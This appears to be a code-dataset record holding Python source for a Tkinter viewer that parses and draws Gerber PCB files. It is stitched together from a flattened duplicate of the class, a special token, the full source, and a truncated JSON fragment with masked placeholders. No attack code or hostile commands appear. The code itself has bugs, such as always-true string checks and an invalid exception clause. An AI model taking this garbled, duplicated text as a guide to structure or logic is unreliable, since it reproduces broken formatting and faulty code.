y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number) - 5]
if '-' in number:
return first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + 0.1
last_y = float(y1) + 0.1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i',
str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=
color, fill=color)
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= 0.1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
temp_list = self.file_commands
for item in temp_list:
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
if 'G01' in item:
self.graphics_mode = 1
if 'G03' in item:
self.direction = 270
if 'G02' in item:
self.direction = 90
if 'G74' in item:
self.quadrant_mode = 0
if 'G75' in item:
self.quadrant_mode = 1
if '%AD' in item:
name = item[3:item.find(',') - 1]
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if 'D01' in item and ('I' not in item and 'J' not in item):
self.__get_numbers(item)
self.my_canvas.create_line(self.start_x + 'i', self.start_y +
'i', self.x + 'i', self.y + 'i', width=self.
current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
if 'D01' and 'I' and 'J' in item:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode:
if self.start_x == self.x and self.start_y == self.y:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i',
str(cp_y - radius) + 'i', str(cp_x + radius) +
'i', str(cp_y + radius) + 'i', outline='black',
width=self.current_aperture)
else:
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.
start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) -
cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i',
str(cp_y + radius) + 'i', str(cp_x - radius) +
'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
<|reserved_special_token_1|>
import tkinter as tk
from pickplace import PickPlace
import sys
import math
from tkinter import messagebox
import os
DEBUG = False
class GerberCanvas:
file_gto = False
file_gtp = False
units = 0
units_string = ('i', 'm')
"""
my canvas
"""
def __init__(self, frame):
self.x_format = ''
self.y_format = ''
self.units = ''
self.quadrant_mode = 0
self.file_commands = ''
self.file_gtp_commands = ''
self.gerber_file_name = ''
self.AD_commands = {} # dict to hold aperture commands
self.current_aperture = ''
self.x = '0'
self.y = '0'
self.i = '0'
self.j = '0'
self.last_x = ''
self.last_y = ''
self.start_x = ''
self.start_y = ''
self.direction = 0
self.graphics_mode = 0
self.scaled = False
self.bounding_box_size = ()
self._canvas_frame = frame
self.create_canvas()
def create_canvas(self):
self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')
self.my_canvas.pack(expand=True, fill='both')
if sys.platform == 'linux':
self.my_canvas.bind('<Button-4>', self.__scale_image_up)
self.my_canvas.bind('<Button-5>', self.__scale_image_down)
else:
self.my_canvas.bind('<MouseWheel>', self.__scale_image)
# fixme fix the scrollbars so that they work correctly
self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.my_canvas.yview)
self.y_scrollbar.pack(expand=True, fill='y', anchor='e')
self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.HORIZONTAL, command=self.my_canvas.xview)
self.x_scrollbar.pack(fill='x', anchor='s')
# Set this only if using in Linux
if sys.platform == 'linux':
self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)
self.__part_selected = 0
def load_gerber(self, path, file):
"""load gerber file
:param path: path to the file
:param file: file name to use
"""
try:
# file_path = askopenfilename(title='Open Top Silk Screen File', filetypes=[('GTO files', '*.GTO')],
# initialdir='')
all_ids = self.my_canvas.find_all()
# delete the current image if one exist.
if all_ids:
try:
for item in all_ids:
print(item)
self.my_canvas.delete(item)
except tk.TclError:
messagebox.showerror('Error', tk.TclError)
if path:
self.file_gto = True
try:
with open(os.path.join(path, file), 'r') as gerber_file:
self.file_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
# self._parse_file(gerber_file.read())
self.__parse_file(self.file_commands)
self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')
self.gerber_file_name = file
self.scaled = False
# self.bounding_box_size = self.my_canvas.bbox('all')
if DEBUG:
print('Scroll region is : ', self.bounding_box_size)
except IOError:
messagebox.showerror('File Error', 'File did not open, GTO')
finally:
self.file_gto = False
# load top pads into image
self.load_gerber_gtp(os.path.join(path, file))
self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))
# self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)
def load_gerber_gtp(self, file_path):
self.file_gtp = True
try:
print(file_path)
new_file = 'c' + file_path[1:len(file_path)-3]+'GTP'
print('final name =', new_file)
if file_path:
try:
with open(new_file, 'r') as gerber_file:
self.file_gtp_commands = gerber_file.read().splitlines()
except TypeError:
messagebox.showerror('Type Error', 'Invalid File Type')
self.__parse_file(self.file_gtp_commands)
# self.scaled = False
except IOError:
messagebox.showerror('File Error', 'File did not open, GTP')
def __parse_file(self, commands):
if DEBUG:
print(self.file_commands)
temp_list = commands
for item in temp_list:
if DEBUG:
print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
GerberCanvas.units = 0
if 'MM' in item:
GerberCanvas.units = 1
# print('units is ', self.units)
if 'G01' in item:
self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear
if 'G03' in item:
self.direction = 270 # CounterClockWise
if 'G02' in item:
self.direction = 90 # ClockWise
if 'G74' in item:
self.quadrant_mode = 0 # single Quadrant mode
if 'G75' in item:
self.quadrant_mode = 1 # Multi quadrant mode
if '%AD' in item: # define the aperture
name = item[3:item.find(',')-1]
if DEBUG:
print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start-1:stop]
if DEBUG:
print(value)
self.AD_commands[name] = value
if item[0:1] == 'D': # set the current aperture
item = item[0:item.find('*')]
if DEBUG:
print('I found a ', item)
for key, value in self.AD_commands.items():
self.current_ad_command = key
if item in key:
if 'R,' in value: # for a rectangle
print(value)
x, y = self.__get_rectangle_size(value)
self.rect_x = x
self.rect_y = y
print('Half of x is: ', float(self.rect_x)/2)
# todo send this to a function to get size
elif 'C,' in value: # for a circle
print(value)
self.current_aperture = self.__get_circle_diameter(value)
elif 'O,' in value: # for a ob-round
pass
elif 'P,' in value: # for a polygon
pass
elif 'TARGET' in value:
pass
elif 'THERMAL' in value:
pass
# This is the Flash command. Create a flash of the object.
if 'D03' in item:
if DEBUG:
print('current key is = ', self.current_ad_command)
print(self.AD_commands[self.current_ad_command])
if 'R,' in self.AD_commands[self.current_ad_command]:
if DEBUG:
print('draw a rectangle')
x0 = float(self.start_x) - float(self.rect_x) / 2
y0 = float(self.start_y) + float(self.rect_y) / 2
x1 = float(self.start_x) + float(self.rect_x) / 2
y1 = float(self.start_y) - float(self.rect_y) / 2
self.my_canvas.create_rectangle(str(x0) + GerberCanvas.units_string[GerberCanvas.units],
str(y0) + GerberCanvas.units_string[GerberCanvas.units],
str(x1) + GerberCanvas.units_string[GerberCanvas.units],
str(y1) + GerberCanvas.units_string[GerberCanvas.units],
outline='white', fill='black')
if 'C,' in self.AD_commands[self.current_ad_command]:
print('draw a circle')
# the D02 command is the move to command.
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
# if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line
if ('D01' in item) and (('I' not in item) and ('J' not in item)):
if self.file_gto: # draw a line
self.__get_numbers(item)
if DEBUG:
print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)
self.my_canvas.create_line(self.start_x+'i', self.start_y+'i', self.x+'i', self.y+'i',
width=self.current_aperture+'i')
self.start_x = self.x
self.start_y = self.y
# this Draws a circle.
if 'D01' and 'I' and 'J' in item: # draw a circle/arc
if self.file_gto:
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item) # test
if self.quadrant_mode: # This draws circles or arcs
if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
try:
self.my_canvas.create_oval(str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],
outline='black', width=self.current_aperture)
except UnboundLocalError():
messagebox.showwarning('Warning', 'Something went wrong.')
break
else: # This draws arcs
# self.evaluate_arc_command(item)
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if DEBUG:
print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
else:
radius = 0.0
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))
# radius = math.degrees(self.__get_extent(radius))
try:
self.my_canvas.create_arc(str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],
str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],
style=tk.ARC, width=self.current_aperture, start=start_angle,
extent=end_angle-start_angle, outline='black')
# self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,
# outline='purple')
except UnboundLocalError():
messagebox.showwarning('Warning', 'Something went wrong.')
@staticmethod
def __get_circle_diameter(value):
return value[3:len(value)]
@staticmethod
def __get_rectangle_size(value):
print(value)
find_x = value.find('X'[0:len(value)])
width = value[2:find_x]
length = value[find_x+1:len(value)]
print(width, length)
return width, length
def __get_extent(self, radius):
distance = self.__distance(float(self.start_x), float(self.start_y), float(self.x), float(self.y))
if DEBUG:
print('distance = ', distance)
number = (1-((distance**2) / (2*(radius**2))))
result = number - int(number)
return math.acos(result)
@staticmethod
def __distance(start_x, start_y, end_x, end_y):
"""calculate distance between two points
:param start_x
:param start_y
:param end_x
:param end_y
"""
distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)
return distance
def __set_direction(self):
if self.x == self.start_x:
if self.y < self.start_y:
self.direction = 90
else:
self.direction = 270
if self.y == self.start_y:
if self.x < self.start_x:
self.direction = 0
else:
self.direction = 180
def __get_numbers(self, item):
found = 0
if 'I' in item and 'J' in item and found == 0:
found = 1
i_start = item.find('I')
j_start = item.find('J')
d_start = item.find('D')
i_temp = item[i_start+1:j_start]
j_temp = item[j_start+1:d_start]
j_temp = str(int(j_temp) * -1)
self.i = self.__format_number(i_temp)
self.j = self.__format_number(j_temp)
if 'X' and 'Y' in item:
found = 0
if 'X' in item and 'Y' in item and found == 0:
found = 1
x_start = item.find('X')
y_start = item.find('Y')
d_start = item.find('D')
x_temp = item[x_start+1:y_start]
y_temp = item[y_start+1:d_start]
if ('I' or 'J') in y_temp:
for i in range(1, len(y_temp)):
if y_temp[i] == 'I':
y_temp = y_temp[0:i]
break
y_temp = str(int(y_temp) * -1)
self.x = self.__format_number(x_temp)
self.y = self.__format_number(y_temp)
if 'X' in item and found == 0:
found = 1
x_start = item.find('X')
d_start = item.find('D')
x_temp = item[x_start+1:d_start]
self.x = self.__format_number(x_temp)
if 'Y' in item and found == 0:
found = 1
y_start = item.find('Y')
d_start = item.find('D')
y_temp = item[y_start + 1:d_start]
# flip my y axis
y_temp = str(int(y_temp) * -1)
self.y = self.__format_number(y_temp)
def __format_number(self, number):
how_long = len(number)
if how_long <= int(self.x_format[1]):
if '-' in number:
temp = number[1:len(number)]
return '-.' + temp.zfill(int(self.x_format[1]))
else:
return '.' + number.zfill(int(self.x_format[1]))
elif how_long > int(self.x_format[1]):
last = number[-5:len(number)]
first = number[0:len(number)-5]
if '-' in number:
return first + '.' + last
# return '-' + first + '.' + last
else:
return first + '.' + last
def high_lite_part(self, x, y, layer):
x1 = self.__format_pnp(x)
y1 = self.__format_pnp(y) * -1
last_x = float(x1) + .1
last_y = float(y1) + .1
if layer == 'TopLayer':
color = 'red'
else:
color = 'blue'
self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i',
outline=color, fill=color)
# elif layer == 'BottomLayer':
# self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i',
# str(last_y) + 'i', outline='blue', fill='blue')
def delete_current_highlight(self):
if self.__part_selected:
self.my_canvas.delete(self.__part_selected)
def __scale_image_up(self, event=None):
self.scale_factor = 1
self.scale_factor += .1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image_down(self, event=None):
self.scale_factor = 1
self.scale_factor -= .1
self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)
if PickPlace.is_file_loaded:
PickPlace.adjust_pic_n_place(self.scale_factor)
self.scaled = True
def __scale_image(self, event=None):
if event.delta >= 120:
self.__scale_image_up()
elif event.delta <= -120:
self.__scale_image_down()
self.scaled = True
@staticmethod
def __format_pnp(number):
move1 = float(number) / 10
move2 = move1 / 10
final = move2 / 10
return final
def __parse_file_gtp(self):
# print(self.file_commands)
temp_list = self.file_commands
for item in temp_list:
# print(item)
if '%FSLA' in item:
self.x_format = item[6:8]
self.y_format = item[9:11]
if '%MO' in item:
self.units = item[3:5]
if 'IN' in item:
self.__inch = 1
self.__mm = 0
if 'MM' in item:
self.__inch = 0
self.__mm = 1
# print('units is ', self.units)
if 'G01' in item:
self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear
if 'G03' in item:
self.direction = 270 # CounterClockWise
if 'G02' in item:
self.direction = 90 # ClockWise
if 'G74' in item:
self.quadrant_mode = 0 # single Quadrant mode
if 'G75' in item:
self.quadrant_mode = 1 # Multi quadrant mode
if '%AD' in item: # diameter of the circle
name = item[3:item.find(',') - 1]
# print(name)
start = item.find(',')
stop = item.find('*', start)
value = item[start - 1:stop]
# print(value)
self.AD_commands[name] = value[2:len(value)]
if item[0:1] == 'D':
item = item[0:item.find('*')]
# print('I found a ', item)
for key, value in self.AD_commands.items():
if item in key:
self.current_aperture = value
if 'D02' in item:
self.__get_numbers(item)
if 'X' in item and 'Y' not in item:
self.start_x = self.x
if 'Y' in item and 'X' not in item:
self.start_y = self.y
if 'X' in item and 'Y' in item:
self.start_x = self.x
self.start_y = self.y
if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line
self.__get_numbers(item)
# print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)
self.my_canvas.create_line(self.start_x + 'i', self.start_y + 'i', self.x + 'i', self.y + 'i',
width=self.current_aperture + 'i')
self.start_x = self.x
self.start_y = self.y
# this Draws a circle.
if 'D01' and 'I' and 'J' in item: # draw a circle
self.start_x = self.x
self.start_y = self.y
self.__get_numbers(item)
if self.quadrant_mode: # This draws circles or arcs
if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
if self.i != 0:
radius = float(self.i)
elif self.j != 0:
radius = float(self.j)
self.my_canvas.create_oval(str(cp_x - radius) + 'i', str(cp_y - radius) + 'i',
str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',
outline='black', width=self.current_aperture)
else: # This draws arcs
cp_x = float(self.start_x) + float(self.i)
cp_y = float(self.start_y) + float(self.j)
# print(str(cp_x) + ' ' + str(cp_y))
if float(self.i) > 0:
radius = float(self.i)
elif float(self.j) > 0:
radius = float(self.j)
self.__set_direction()
start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))
end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))
ext = math.degrees(self.__get_extent(radius))
self.my_canvas.create_arc(str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',
str(cp_x - radius) + 'i', str(cp_y - radius) + 'i', style=tk.ARC,
width=self.current_aperture, start=start_angle,
extent=end_angle - start_angle, outline='black')
# self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,
# outline='purple')
|
flexible
|
{
"blob_id": "6b2f10449909d978ee294a502a376c8091af06e0",
"index": 1285,
"step-1": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n <mask token>\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n <mask token>\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', 